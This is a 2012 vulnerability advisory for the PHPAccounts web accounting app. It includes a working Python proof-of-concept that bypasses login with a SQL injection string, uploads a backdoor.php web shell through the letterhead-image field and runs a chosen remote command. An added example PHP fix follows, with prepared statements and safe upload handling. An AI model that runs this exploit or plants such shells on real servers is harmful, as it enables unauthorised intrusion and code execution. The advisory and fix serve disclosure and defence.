PHPAccounts SQL Injection and Arbitrary File Upload Vulnerabilities
Published: 2012-06-11
Updated: 2012-06-21
Affected systems:
phpaccounts phpaccounts
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 53920
PHPAccounts is a simple web-based accounting application aimed at small businesses, freelancers and consulting firms.
PHPAccounts contains a SQL injection vulnerability and an arbitrary file upload vulnerability, both caused by a failure to validate user-supplied data. An attacker can exploit them to manipulate the application, execute arbitrary code, access or modify data, or exploit further weaknesses in the underlying database.
<*Source: loneferret
*>
Test method:
--------------------------------------------------------------------------------
Warning
The following program (method) may be offensive in nature and is provided solely for security research and teaching. Users assume all risk!
#!/usr/bin/python
# Python 2 script; requires the mechanize module.
import re, mechanize
import urllib, sys

print "\n[*] phpAcounts v.0.5.3 Remote Code Execution"
print "[*] Vulnerability discovered by loneferret"
print "[*] Offensive Security - http://www.offensive-security.com\n"

if (len(sys.argv) != 3):
    print "[*] Usage: poc.py <RHOST> <RCMD>"
    exit(0)

rhost = sys.argv[1]
rcmd = sys.argv[2]

print "[*] Bypassing Login ."
try:
    br = mechanize.Browser()
    br.open("http://%s/phpaccounts/index.php?frameset=true" % rhost)
    assert br.viewing_html()
    br.select_form(name="loginForm")
    br.select_form(nr=0)
    br.form['Login_Username'] = "x' or '1'#"
    br.form['Login_Password'] = "pwnd"
    print "[*] Triggering SQLi .."
    br.submit()
except:
    print "[*] Oups..Something happened"
    exit(0)

print "[*] Uploading Shell ..."
try:
    br.open("http://%s/phpaccounts/index.php?page=tasks&action=preferences" % rhost)
    assert br.viewing_html()
    br.select_form(nr=0)
    br.form["Preferences[LETTER_HEADER]"] = 'test'
    br.form.add_file(open('backdoor.php'), "text/plain", "backdoor.php", name="letterhead_image")
    br.submit(nr=2)
except:
    print "[*] Upload didn't work"
    exit(0)

print "[*] Command Executed\n"
try:
    shell = urllib.urlopen("http://%s/phpaccounts/users/1/backdoor.php?cmd=%s" % (rhost,rcmd))
    print shell.read()
except:
    print "[*] Oups."
    exit(0)
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
phpaccounts
-----------
The vendor has not yet released a patch or upgrade. Users of this software are advised to monitor the vendor's homepage for the latest version:
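Because no vendor fix is available, the following PHP is an added example of how the two root causes named in the description (an unvalidated login value reaching SQL, and an uploaded "letterhead image" stored and served under its client-supplied name) are closed at the application level. It is not PHPAccounts code and not part of this advisory; the table name `users`, its columns, the function names and the storage directory are assumptions. Only the form field name `letterhead_image` comes from the advisory.

```php
<?php
// Added defensive example; not PHPAccounts code. Table/column names are assumptions.

// 1. Login. The advisory's SQL injection comes from placing Login_Username into
//    the query text. With a prepared statement the value "x' or '1'#" is bound
//    as a literal username and can no longer alter the WHERE clause.
function authenticate(PDO $db, string $username, string $password): ?int {
    $stmt = $db->prepare('SELECT id, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false || !password_verify($password, $row['password_hash'])) {
        return null; // unknown user or wrong password: no session is created
    }
    return (int) $row['id'];
}

// 2. Upload. The advisory's code execution comes from storing the uploaded
//    letterhead file under a web-served path with the name the client chose
//    (backdoor.php). Validate the bytes, discard the client name and type,
//    and store the file outside the document root.
function storeLetterheadImage(array $file, int $userId, string $storageDir): string {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK
            || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > 2 * 1024 * 1024) {
        throw new RuntimeException('file too large');
    }
    // Decide the type from the file contents, not from $file['type'] or $file['name'].
    $info = getimagesize($file['tmp_name']);
    $allowed = [IMAGETYPE_PNG => 'png', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_GIF => 'gif'];
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('not an allowed image type');
    }
    // Server-chosen file name: no user input reaches the path, so no ".php"
    // extension or directory traversal can be smuggled in.
    $dest = rtrim($storageDir, '/') . '/letterhead_' . $userId . '_'
          . bin2hex(random_bytes(8)) . '.' . $allowed[$info[2]];
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // readable, never executable
    return $dest;
}

// 3. Serving. Read the stored file back through a handler instead of exposing
//    the upload directory, so the bytes are returned as an image and never
//    handed to the PHP interpreter, even if a polyglot slipped past the check.
function serveLetterheadImage(string $path): void {
    $info = getimagesize($path);
    if ($info === false) {
        http_response_code(404);
        return;
    }
    header('Content-Type: ' . $info['mime']);
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: inline; filename="letterhead"');
    readfile($path);
}

// Usage in the preferences handler (paths and the PDO DSN are assumptions):
// $db   = new PDO('mysql:host=localhost;dbname=phpaccounts', 'app', 'secret');
// $uid  = authenticate($db, $_POST['Login_Username'], $_POST['Login_Password']);
// $path = storeLetterheadImage($_FILES['letterhead_image'], $uid, '/var/lib/phpaccounts/uploads');
```

Two points matter for this to hold. `getimagesize()` only confirms that the header looks like an image; a file can be a valid image and still carry PHP code in a comment block, which is why the storage directory must be outside the web root (or have script execution disabled) and why the file is delivered through `serveLetterheadImage()` rather than by a direct URL such as the advisory's `/phpaccounts/users/1/backdoor.php`. Likewise, the prepared statement removes the injection only if every query that consumes form data is written this way; a single remaining string-built query reopens the same hole.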